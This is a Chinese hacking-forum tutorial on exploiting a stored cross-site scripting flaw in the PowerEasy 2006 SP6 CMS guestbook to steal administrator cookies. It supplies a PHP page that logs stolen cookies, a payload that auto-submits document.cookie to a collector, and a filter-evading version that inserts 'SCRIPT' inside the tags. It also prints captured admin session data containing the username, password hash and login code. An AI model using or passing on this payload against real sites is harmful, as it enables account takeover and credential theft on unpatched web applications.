·	完美空间提供500M免费AS	04-10	·	企业安全之YY内网准入以	04-09
·	企业安全之意识与策略	04-09	·	剑走偏锋:IIS漏洞利用	04-09
·	我来免费网提供100M免费	04-09	·	1122mb.com提供20G超大免	04-08
·	映像劫持与反劫持技术	04-07	·	让所有"暴力删除工具"无	04-07
·	入侵88red系统的详细过程	04-07	·	Sql Injection脚本注入终	04-07
·	vbs+delphi 反弹后门生成	04-07	·	飞讯网提供100MB免费PHP	04-07
·	突破SQL注入攻击时输入框	04-04	·	结合内核和病毒技术的最	04-04
·	Real Player rmoc3260.d	04-04	·	亿万网络今月最后为您提	04-04
·	php+mysql 5 sql inject	04-03	·	Real Player rmoc3260.d	04-03
·	oblog文件下载漏洞	04-03	·	免费啦提供1G-2G免费全能	04-03
·	完全解析网页后门和挂马	04-02	·	一句话开3389（只测试过	04-02
·	萧萧免费空间网提供100M	04-02	·	谷道免费空间网提供1G免	04-01
·	从本地入手解决双线路由	03-31	·	sablog 1.6 多个跨站漏洞	03-31
·	富文本编辑器的跨站脚本	03-31	·	Cookie注入是怎样产生的	03-31

[推荐]动易2006_SP6最新漏洞得到管理员密码

热荐 ★★★★★

动易2006_SP6最新漏洞得到管理员密码

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-8-20 9:45:08

从7j那里看到的，并且有7j写的接收页面。

7j:没有找到他说的接收页面,只有自已用PHP写个了

以下是引用片段：
<?
$filename = date("Ymd").".txt";
$time = @date("Y年m月d号H点i分s秒",time());
$cookie = $_POST['cookie'];
$url = $_POST['url'];
$hostname = $_POST['hostname'];
if ($cookie <> ""){
$tmp = fopen($filename,"a+");
fwrite($tmp,"地址:".$url."\n主机:".$hostname."\nCookie:".$cookie."\nIP:".$_SERVER['REMOTE_ADDR']."\n".$time."\n");
fclose($tmp);
}
?>

漏洞主要出现在“雁过留声（留言板）”、“信息管理”和“短消息”里，这里以留言板为例
下面我们来测试一下漏洞
打开留言板，选择源代码模式签写留言
审核发表状态下钓到管理员Cookies的几率比较到
我们先来试试一些文字
输入<>未被过滤
输入<script>过滤成<>，不好意思刚才弄错了
输入scrSCRIPTipt会过滤成script（去掉了中间的大写SCRIPT）
看漏洞出来了
也就是说它会把"Script"字符过滤掉，但是只过滤一次，给了我们可乘之机
（iframe标签你可以自己测试）
下面是一个获得Cookies的代码，会把Cookies提交到http://localhost/cookies/cookies.asp，相关的代码我会打包到教程里

以下是引用片段：
<form name=redir action=http://localhost/cookies/cookie.asp method=post>
<input type=hidden name=cookie>
<input type=hidden name=url>
<input type=hidden name=hostname>
</form>
<script>redir.cookie.value=document.cookie;redir.url.value=location.href;redir.hostname.value=location.hostname;redir.submit();</script>

现在我们在一些可能的敏感字符中插入SCRIPT字符，以防我们的代码被过滤
更改后的代码如下：

以下是引用片段：
<FOSCRIPTRM naSCRIPTme=redSCRIPTir actSCRIPTion=http://locaSCRIPTlhost/cooSCRIPTkies/cooSCRIPTkie.asp>
<input type=hidSCRIPTden name=coSCRIPTokie>
<input type=hidSCRIPTden name=uSCRIPTrl>
<input type=hidSCRIPTden name=hoSCRIPTstname>
</forSCRIPTm>
<scrSCRIPTipt>rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit();</scrSCRIPTipt>

现在我们发表留言

看数据库里的代码是我们修改前的代码
现在以管理员身份登录
现在我们保存cookies的数据库是空的
这是我发送的钓Cookies的网页

好的，现在代码已经执行，管理员的Cookies已经被我们钓到了
我们来看一下

以下是引用片段：
ASPSESSIONIDQCRQQSAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=4P263W7JiD425kyd&UserName=admin&AdminLoginCode=PowerEasy2006&AdminName=admin&UserPassword=469e80d32c0559f8&RndPassword=4P263W7JiD425kyd&AdminPassword=469e80d32c0559f8

怎么样？得到了吧？
里面有管理员的用户名、密码，和管理认证码

信息管理和短消息也可以如法炮制，具体方法我就不多说了
在这里说一下拿到源码后先要修改一下设置，conn.asp里的数据库路径要改一下
还有test.htm里的URL也要改一下，可以用它做测试

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：最新跨站技术

下一篇文章：邮箱的内嵌式框架跨站漏洞

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

入侵88red系统的详细过程	04-07
对趋势科技等数万网站被攻击的分	03-21
凡人网络购物系统 V8.0 简体中文	03-18
linux平台下渗透日本著名XXXXXX.	03-18
搜索框所引起的XSS漏洞	03-05
跳转漏洞的利用	03-05
对复旦大学的一次漫长渗透	03-03
.net一句话马以及dx论坛拿shell	03-01
php渗透入侵过程图文详解	03-01
DJ网站的入侵详细过程	02-26
BBSXP2008存在后台注射漏洞	02-19
Discuz! 6 后台拿Shell的方法	02-17